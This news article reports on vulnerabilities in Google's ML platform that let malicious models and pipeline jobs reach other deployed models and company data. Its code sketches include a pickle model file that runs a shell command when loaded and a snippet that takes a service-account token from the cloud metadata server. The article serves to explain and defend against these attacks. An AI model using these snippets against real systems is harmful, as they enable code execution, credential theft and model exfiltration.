Multiple vulnerabilities have been discovered in the platform that could allow attackers to steal valuable machine learning (ML) and large language models (LLMs) developed internally by a company.

These vulnerabilities include privilege escalation and data exfiltration through maliciously crafted models. The first vulnerability involves privilege escalation through custom jobs in the platform's pipelines. Using this flaw, researchers were able to access data they should not have had access to, including cloud storage buckets and data tables. Attackers could leverage the same access to download sensitive data and models.
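To illustrate the class of problem, here is a minimal sketch of what code running inside an over-privileged pipeline job could do. It assumes a Google Cloud environment, the google-cloud-storage and google-cloud-bigquery client libraries, and a job that inherited a service account with broad project access; it is not the researchers' actual exploit.

```python
# Sketch: reconnaissance from inside an over-privileged custom pipeline job.
# Assumes the job's service account has project-wide read permissions.
from google.cloud import bigquery, storage


def enumerate_reachable_data():
    # List every storage bucket visible to the job's service account.
    storage_client = storage.Client()
    for bucket in storage_client.list_buckets():
        print(f"readable bucket: {bucket.name}")

    # List every BigQuery dataset visible to the same credentials.
    bq_client = bigquery.Client()
    for dataset in bq_client.list_datasets():
        print(f"readable dataset: {dataset.dataset_id}")


if __name__ == "__main__":
    enumerate_reachable_data()
```

Anything this snippet can list, a real payload could also download, which is why the permissions granted to pipeline jobs matter so much.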

The second vulnerability proved to be more dangerous. Researchers demonstrated that when a malicious model is uploaded from a public repository and deployed on the platform, it can access all other models already deployed in the environment. This allows attackers to copy and download custom fine-tuned models and their weights, which may contain unique and sensitive information.
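Deserialization is one common way a model file can carry executable code. The sketch below assumes a pickle-based model format; the mechanism is generic Python behavior, not specific to this platform, and the command it runs is hypothetical. It shows why loading an untrusted model is equivalent to running untrusted code.

```python
# Sketch: a "poisoned" model artifact. Many model formats are pickle-based,
# and pickle invokes __reduce__ during deserialization, so loading the file
# executes attacker-chosen code.
import pickle


class PoisonedModel:
    def __reduce__(self):
        import os
        # Runs automatically when the file is unpickled, e.g. to probe the
        # serving container's environment (hypothetical command).
        return (os.system, ("id && ls /models",))


# Attacker side: serialize the payload as if it were a model checkpoint.
with open("model.pkl", "wb") as f:
    pickle.dump(PoisonedModel(), f)

# Victim side: a routine "load the model" call triggers the payload.
with open("model.pkl", "rb") as f:
    pickle.load(f)
```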

During their research, the experts created their own malicious models and deployed them in a test environment. They then managed to access the platform's service accounts and exfiltrate other models, including adapter files used for fine-tuning. These files, which contain key elements such as model weights, can significantly alter the behavior of the underlying models.
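One standard way code inside a deployed container can obtain the platform's service-account credentials is the cloud metadata server. The endpoint and header in the sketch below are the documented Google Cloud mechanism; that this exact path was used in the research is an assumption.

```python
# Sketch: fetching the access token of whatever service account the serving
# container runs as, via the standard GCP metadata endpoint.
import json
import urllib.request

METADATA_URL = (
    "http://metadata.google.internal/computeMetadata/v1/"
    "instance/service-accounts/default/token"
)


def get_access_token() -> str:
    # The Metadata-Flavor header is required by the GCP metadata server.
    req = urllib.request.Request(
        METADATA_URL, headers={"Metadata-Flavor": "Google"}
    )
    with urllib.request.urlopen(req) as resp:
        return json.loads(resp.read())["access_token"]


# With this token, code inside the container can call cloud APIs as the
# platform's service account, e.g. to list and download other model files.
print(get_access_token()[:16], "...")
```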

The study found that deploying even a single unvetted model could lead to the leakage of intellectual property and company data. To mitigate such threats, the researchers recommend isolating test and production environments and strictly controlling who can deploy new models.
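As a concrete example of the second recommendation, a deployment pipeline can refuse any model artifact whose checksum is not on a reviewed allowlist. The following is a minimal sketch of that idea, not the researchers' tooling; the digest and model name are hypothetical placeholders.

```python
# Sketch: a deployment gate that only admits model artifacts whose SHA-256
# digest appears on a manually reviewed allowlist.
import hashlib
import sys

APPROVED_DIGESTS = {
    # Filled in by a security-review step, one digest per vetted artifact
    # (hypothetical entry shown).
    "9f2c8b1d0e7a4c33": "sentiment-model-v3",
}


def sha256_of(path: str) -> str:
    h = hashlib.sha256()
    with open(path, "rb") as f:
        for chunk in iter(lambda: f.read(1 << 20), b""):
            h.update(chunk)
    return h.hexdigest()


def gate(path: str) -> None:
    digest = sha256_of(path)
    if digest not in APPROVED_DIGESTS:
        sys.exit(f"BLOCKED: {path} ({digest[:12]}...) is not an approved artifact")
    print(f"OK: deploying {APPROVED_DIGESTS[digest]}")


if __name__ == "__main__":
    gate(sys.argv[1])
```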

Google responded swiftly to the vulnerabilities reported by the researchers, releasing updates and deploying fixes that close the identified attack vectors. The platform is now more resistant to unauthorized access and data loss.

Any unvetted AI model can become a Trojan horse that opens the door to the entire enterprise infrastructure. In an era where data is among a company's most valuable assets, even a single overlooked security gap can result in millions of dollars in losses. Only strict access control and continuous verification at every stage of deployment can protect intellectual assets from leakage.


Author: Emma

An experienced news writer focusing on in-depth reporting and analysis in the fields of economics, military affairs, technology, and warfare. With over 20 years of experience in news reporting and editing, she has worked in global hotspots and witnessed many major events firsthand. Her work has been widely acclaimed and has won numerous awards.
